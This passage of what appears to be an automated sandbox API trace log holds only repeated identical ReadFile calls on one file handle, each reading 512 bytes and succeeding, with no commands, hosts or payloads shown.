lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.748] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.749] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.750] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.751] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.752] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.753] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.755] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, 